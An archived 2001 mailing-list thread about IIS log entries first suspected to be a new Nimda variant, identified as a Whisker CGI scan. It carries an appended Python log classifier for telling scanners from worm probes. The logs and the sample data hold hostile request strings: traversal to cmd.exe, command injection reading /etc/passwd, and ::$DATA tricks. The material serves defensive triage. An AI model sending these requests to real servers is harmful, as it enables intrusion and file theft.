RE: possible new Nimda variant

From: Steve Halligan (agent33at_private)
Date: Fri Nov 16 2001 - 08:30:48 PST


    Looks like a Whisker scan to me.
    http://www.wiretrip.net/rfp/p/doc.asp/i2/d21.htm
    -Steve
    
    > -----Original Message-----
    > From: Howard Gleason [mailto:howard.gleasonat_private]
    > Sent: Friday, November 16, 2001 7:53 AM
    > To: incidentsat_private
    > Subject: possible new Nimda variant
    > 
    > 
    > Mailer: SecurityFocus
    > 
    > Anyone else seen this? It hit my IIS logs last night. It has
    > some similarities to Nimda but is not identical.
    > --------------------------------------------------
    > #Fields: date time c-ip cs-username s-sitename cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes cs-bytes time-taken s-port cs-version cs(User-Agent)
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD / - 400 87 138 19 47 80 HTTP\1.0 -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /msadc/ - 404 2 143 26 15 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /scripts/ - 403 5 143 28 16 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /scripts/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir 500 87 0 98 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ - 404 2 143 28 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /bin/ - 404 2 143 24 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /samples/ - 404 2 143 28 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_cnf/ - 404 2 143 29 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_bin/ - 404 2 143 29 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /iisadmpwd/ - 404 2 143 30 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /winnt/system32/cmd.exe /c+dir 404 3 604 98 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /winnt/system32/cmd.exe /c+dir 404 3 604 89 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /winnt/system32/cmd.exe /c+dir 404 3 604 125 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /Default.htm - 200 0 278 22 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /lanscan.ida - 404 2 143 33 15 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /lanscan.idq - 404 2 143 33 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cfdocs/ - 404 2 143 27 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cfide/ - 404 2 143 26 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_inf.html - 404 2 143 35 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /tsweb - 404 2 143 27 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_bin/_vti_aut/ - 404 3 143 39 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /default.asp::$DATA - 404 2 604 39 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /default.asp. - 404 2 604 35 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ - 404 2 143 28 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /Default.htm - 200 0 278 22 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /carbo.ddl - 404 2 143 31 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /technote/ - 404 2 143 29 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /iisadmpwd/ - 404 2 143 30 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-dos/ - 404 2 143 28 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /scripts/ - 403 5 143 28 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /scripts/perl.exe - 404 2 143 36 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /mall_log_files/ - 404 2 143 35 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /Admin_files/ - 404 2 143 32 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /quote.html - 404 2 604 31 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ikonboard/ - 404 3 143 38 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /foldoc/ - 404 2 143 27 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-bin/adcycle/ - 404 3 143 36 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /ROADS/ - 404 2 143 26 16 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /way-board/ - 404 2 143 30 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-bin/a1stats/ - 404 3 143 36 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /index.php chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc 404 2 604 71 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /scripts/shopplus.cgi dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| 404 2 604 98 0 80 HTTP/1.0+ -
    > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /edit_image.php dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 404 2 604 86 0 80 HTTP/1.0+ -
    > 
    > --------------------------------------------------------------
    > --------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management 
    > and tracking system please see: http://aris.securityfocus.com
    > 
    
    
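The thread above turns on telling a Whisker-style CGI scan from a Nimda probe by looking at the IIS W3C-extended log. The following is an added example, not code from either poster, from Whisker, or from SecurityFocus: a small Python classifier that reads the #Fields directive to parse records, groups them by client IP, and labels each burst with assumed heuristics (HEAD-driven enumeration of many distinct paths inside a short window, plus Unix-style CGI payloads that make no sense against IIS, versus a GET-only burst aimed at root.exe and cmd.exe with a /c+dir query). The 64.14.103.102 records are a subset of Howard's log with the mail-wrapped lines rejoined and the first line's version field normalised to HTTP/1.0; the 10.0.0.7 records are constructed to resemble a worm probe and include one 200 so the "command actually ran" check has something to catch. The function names, the 10.0.0.7 address, the 60-second window, the ten-path threshold and the rule order are all assumptions, not a published signature.

```python
"""Tell a Whisker-style CGI scan from a Nimda-style probe in IIS W3C logs.

Added example for this thread; not code from either poster or from Whisker.
The 64.14.103.102 records are adapted from the log posted by Howard (wrapped
lines rejoined, a subset of the burst); the 10.0.0.7 records are constructed
to resemble a worm probe.  Thresholds and rules are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
#Fields: date time c-ip cs-username s-sitename cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes cs-bytes time-taken s-port cs-version cs(User-Agent)
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD / - 400 87 138 19 47 80 HTTP/1.0 -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /msadc/ - 404 2 143 26 15 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /scripts/ - 403 5 143 28 16 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /scripts/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir 500 87 0 98 0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ - 404 2 143 28 0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_bin/ - 404 2 143 29 0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /iisadmpwd/ - 404 2 143 30 0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /winnt/system32/cmd.exe /c+dir 404 3 604 98 0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /lanscan.ida - 404 2 143 33 15 80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cfdocs/ - 404 2 143 27 0 80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /default.asp::$DATA - 404 2 604 39 0 80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /scripts/shopplus.cgi dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| 404 2 604 98 0 80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /edit_image.php dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 404 2 604 86 0 80 HTTP/1.0+ -
2001-11-15 23:30:01 10.0.0.7 - W3SVC1 GET /scripts/root.exe /c+dir 404 3 604 72 0 80 HTTP/1.0 -
2001-11-15 23:30:01 10.0.0.7 - W3SVC1 GET /MSADC/root.exe /c+dir 404 3 604 70 0 80 HTTP/1.0 -
2001-11-15 23:30:01 10.0.0.7 - W3SVC1 GET /c/winnt/system32/cmd.exe /c+dir 404 3 604 80 0 80 HTTP/1.0 -
2001-11-15 23:30:01 10.0.0.7 - W3SVC1 GET /d/winnt/system32/cmd.exe /c+dir 404 3 604 80 0 80 HTTP/1.0 -
2001-11-15 23:30:02 10.0.0.7 - W3SVC1 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 0 1340 96 0 80 HTTP/1.0 -
"""

# Matched against what IIS wrote to the log, not the wire request.
EXEC_RE = re.compile(r"(?:cmd|root)\.exe$", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"\.\.(?:%[0-9a-f]{2}|[/\\])", re.IGNORECASE)
UNIX_RE = re.compile(r"/etc/passwd|/cgi-bin/|\.cgi\b|\.php\b", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields directive.

    Field order comes from the log itself, so the parser survives an admin
    adding or removing columns.  Lines whose field count does not match
    (e.g. wrapped by a mail client, as in the post) are skipped rather than
    silently misaligned.
    """
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))


def _stamp(rec):
    return datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")


def classify(records, window_seconds=60, min_distinct=10):
    """Group records by client IP and label each burst (assumed heuristics).

    "nimda-like worm probe": GET only, every request targets root.exe or
    cmd.exe with a /c+dir query, and root.exe is among the targets.
    "cgi scanner (whisker-style)": many distinct paths in a short window,
    using HEAD for enumeration or carrying Unix-style CGI payloads.
    A 200 on any root.exe/cmd.exe request is reported separately: it means
    the command ran, whichever label the burst gets.
    """
    by_ip = defaultdict(list)
    for rec in records:
        by_ip[rec["c-ip"]].append(rec)

    report = {}
    for ip, recs in by_ip.items():
        stems = {r["cs-uri-stem"] for r in recs}
        methods = {r["cs-method"] for r in recs}
        stamps = sorted(_stamp(r) for r in recs)
        span = (stamps[-1] - stamps[0]).total_seconds()
        execs = [r for r in recs
                 if EXEC_RE.search(r["cs-uri-stem"])
                 and r["cs-uri-query"].lower().startswith("/c+")]
        root_exe = any(r["cs-uri-stem"].lower().endswith("/root.exe") for r in recs)
        urls = [r["cs-uri-stem"] + "?" + r["cs-uri-query"] for r in recs]
        unix_hits = sum(1 for u in urls if UNIX_RE.search(u))
        traversals = sum(1 for u in urls if TRAVERSAL_RE.search(u))

        if root_exe and methods == {"GET"} and len(execs) == len(recs):
            verdict = "nimda-like worm probe"
        elif (len(stems) >= min_distinct and span <= window_seconds
              and ("HEAD" in methods or unix_hits)):
            verdict = "cgi scanner (whisker-style)"
        else:
            verdict = "unclassified"

        report[ip] = {
            "verdict": verdict,
            "requests": len(recs),
            "distinct_paths": len(stems),
            "methods": sorted(methods),
            "span_seconds": span,
            "exec_attempts": len(execs),
            "exec_success": sum(1 for r in execs if r["sc-status"] == "200"),
            "traversals": traversals,
            "unix_payloads": unix_hits,
        }
    return report


def classify_sample():
    """Run the classifier over the embedded sample log."""
    return classify(parse_w3c(SAMPLE_LOG))


if __name__ == "__main__":
    for ip, summary in classify_sample().items():
        print(ip, summary)
```

To use it on a real log, pass the file contents to parse_w3c and feed the result to classify. The label is only triage: an exec_success of anything other than zero means the host must be handled as compromised regardless of whether the source looked like a scanner or a worm. The 500 on the %5c traversal in Howard's log is not counted as success here, and is the one line in that burst worth checking by hand.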



    This archive was generated by hypermail 2b30 : Fri Nov 16 2001 - 08:44:18 PST